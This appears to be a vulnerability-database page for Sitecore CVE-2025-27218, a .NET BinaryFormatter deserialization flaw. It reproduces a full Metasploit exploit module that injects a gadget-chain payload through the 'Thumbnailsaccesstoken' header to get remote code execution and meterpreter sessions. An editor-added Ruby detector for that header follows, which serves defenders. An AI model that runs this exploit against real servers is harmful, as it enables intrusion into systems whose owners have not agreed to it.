| Title | Published | Views | Reporter |
|---|---|---|---|
| The vulnerability of the Sitecore Experience Platform (XP) and Sitecore Experience Manager (XM) content management systems, related to improper code generation, allows attackers to execute arbitrary code. | 6 Jan 2026 00:00 | – | bdu_fstec |
| CVE-2025-27218 | 20 Feb 2025 06:41 | – | circl |
| Sitecore Experience Manager and Experience Platform security vulnerability | 20 Feb 2025 00:00 | – | cnnvd |
| CVE-2025-27218 | 20 Feb 2025 00:00 | – | cve |
| CVE-2025-27218 | 20 Feb 2025 00:00 | – | cvelist |
| Sitecore 10.4 - Remote Code Execution (RCE) | 26 Jun 2025 00:00 | – | exploitdb |
| Mars: insecure deserialize object leads to RCE On Sitecore (CVE-██████████-27218) | 12 Apr 2025 14:39 | – | hackerone |
| Sitecore Experience Manager (XM)/Experience Platform (XP) 10.4 - Insecure Deserialization | 3 Jul 2026 13:39 | – | nuclei |
| CVE-2025-27218 | 20 Feb 2025 05:15 | – | nvd |
| Sitecore CVE-2025-27218 BinaryFormatter Deserialization | 28 Mar 2025 00:00 | – | packetstorm |
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Util::DotNetDeserialization
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sitecore CVE-2025-27218 BinaryFormatter Deserialization Exploit',
        'Description' => %q{
          This module exploits a .NET deserialization vulnerability in Sitecore Experience Manager (XM) and Experience
          Platform (XP) 10.4 by injecting a malicious Base64-encoded BinaryFormatter payload into an HTTP header.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Dylan Pindur', # Discovery
          'machang-r7' # Module Creator
        ],
        'References' => [
          ['CVE', '2025-27218'],
          ['EDB', '52344'],
          ['URL', 'https://support.sitecore.com/kb?id=kb_article_view&sysparm_article=KB1003535'],
          ['URL', 'https://attackerkb.com/topics/Dyo4zUm2tv/cve-2025-27218']
        ],
        'DisclosureDate' => '2025-01-06',
        'DefaultTarget' => 0,
        'Platform' => 'win',
        'Targets' => [
          [
            'Windows Command',
            {
              'Arch' => ARCH_CMD,
              'Type' => :windows_command
              # tested with cmd/windows/http/x64/meterpreter/reverse_tcp
            }
          ],
          [
            'PowerShell Stager',
            {
              'Arch' => [ARCH_X86, ARCH_X64],
              'Type' => :psh_stager
              # tested with windows/x64/meterpreter/reverse_tcp
            }
          ]
        ],
        'DefaultOptions' => {
          'RPORT' => 443,
          'SSL' => true
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      OptString.new('TARGETURI', [true, 'Path to the vulnerable endpoint', '/'])
    ])
  end

  # Fingerprint only: matches the default Sitecore landing page title. It does not
  # check the product version or patch level, so a hit is reported as Detected,
  # not Vulnerable.
  def check
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET'
    })

    if res&.code == 200 && res&.get_html_document&.at('//title')&.text&.strip == 'Welcome to Sitecore'
      CheckCode::Detected('The target is running SiteCore.')
    else
      CheckCode::Safe('The target does not appear to be running SiteCore.')
    end
  end

  def exploit
    case target['Type']
    when :windows_command
      execute_command(payload.encoded)
    when :psh_stager
      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
    end
  end

  def execute_command(cmd, _opts = {})
    # WindowsIdentity gadget chain serialised with BinaryFormatter, then
    # Base64-encoded so it fits in a single header value.
    sploit = Rex::Text.encode_base64(::Msf::Util::DotNetDeserialization.generate(
      cmd,
      gadget_chain: :WindowsIdentity,
      formatter: :BinaryFormatter
    ))

    # Build HTTP request with malicious header
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path),
      'method' => 'GET',
      'headers' => {
        'Thumbnailsaccesstoken' => sploit
      }
    })

    # A 200 only shows the request was accepted; the module does not verify
    # execution, so the session callback is the real success signal.
    if res && res.code == 200
      print_good('Server responded with 200, this probably means it worked.')
    else
      print_error("Server didn't respond with 200. Try setting the target URL to a valid page.")
    end
  end
end
```
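The module above gives defenders two concrete things to look for: the header name it abuses (`Thumbnailsaccesstoken`) and the fact that the value is a Base64-encoded BinaryFormatter stream. The example below, added by the editor and not part of the Vulners page or the Metasploit module, turns that into a request inspector: it finds the header (case-insensitively, since ASP.NET header matching is), decodes the value, and parses the 17-byte SerializationHeaderRecord that opens every BinaryFormatter stream (MS-NRBF: record type 0x00, RootId, HeaderId, MajorVersion 1, MinorVersion 0) rather than matching on a fixed Base64 prefix. The sample requests and the stub stream are constructed for the example and are not captured traffic or a working gadget chain.

```ruby
require 'base64'

# Header name used by the module above. IIS/ASP.NET matches header names
# case-insensitively, so the detector compares lower-cased names.
SUSPECT_HEADER = 'thumbnailsaccesstoken'

# Parse the fixed 17-byte SerializationHeaderRecord that opens every
# BinaryFormatter stream (MS-NRBF 2.6.1):
#   RecordTypeEnum (1 byte, 0x00), RootId, HeaderId, MajorVersion, MinorVersion
#   (four little-endian INT32s). Major version must be 1 and minor 0.
def binaryformatter_stream?(bytes)
  return false if bytes.nil? || bytes.bytesize < 17

  record_type, _root_id, _header_id, major, minor = bytes.unpack('Cl<l<l<l<')
  record_type == 0 && major == 1 && minor == 0
end

# Decode a header value as an attacker might have encoded it: standard
# alphabet with padding first (what Rex::Text.encode_base64 emits), then
# URL-safe/unpadded. Returns nil when the value is not Base64 at all.
def decode_header_value(value)
  Base64.strict_decode64(value)
rescue ArgumentError
  begin
    Base64.urlsafe_decode64(value)
  rescue ArgumentError
    nil
  end
end

# Inspect one request (Hash with :method, :path, :headers) and return a
# finding string, or nil when no header carries a BinaryFormatter stream.
def inspect_request(req)
  req[:headers].each do |name, value|
    next unless name.downcase == SUSPECT_HEADER

    decoded = decode_header_value(value.strip)
    if binaryformatter_stream?(decoded)
      return "BinaryFormatter stream in #{name} header on " \
             "#{req[:method]} #{req[:path]} (#{decoded.bytesize} bytes)"
    end
  end
  nil
end

def scan_requests(requests)
  requests.map { |req| inspect_request(req) }.compact
end

# --- Constructed sample data (assumption: not real traffic) ---

# Stub that only looks like the start of a gadget-chain stream: the
# SerializationHeaderRecord (RootId 1, HeaderId -1, version 1.0) followed by a
# BinaryLibrary record (0x0C, library id 2) with a length-prefixed name.
STUB_STREAM = [0x00, 1, -1, 1, 0].pack('Cl<l<l<l<') +
              [0x0C, 2].pack('Cl<') + "\x08mscorlib".b

SAMPLE_REQUESTS = [
  # benign: no suspect header at all
  { method: 'GET', path: '/', headers: { 'Host' => 'cms.example.internal',
                                         'User-Agent' => 'Mozilla/5.0' } },
  # suspect header present, but the value is ordinary Base64 text, not a stream
  { method: 'GET', path: '/', headers: { 'Host' => 'cms.example.internal',
                                         'thumbnailsaccesstoken' => Base64.strict_encode64('opaque-session-token') } },
  # suspect header carrying a BinaryFormatter stream (same spelling as the module)
  { method: 'GET', path: '/', headers: { 'Host' => 'cms.example.internal',
                                         'Thumbnailsaccesstoken' => Base64.strict_encode64(STUB_STREAM) } }
]

if __FILE__ == $PROGRAM_NAME
  scan_requests(SAMPLE_REQUESTS).each { |finding| puts finding }
end
```

Parsing the header record instead of matching the familiar `AAEAAAD/////AQAAAAAAAAA` Base64 prefix keeps the check working when the attacker changes the encoding or the RootId/HeaderId values; for a production rule, feed it from a WAF or reverse-proxy log that preserves request headers, since standard IIS W3C logs do not record custom ones.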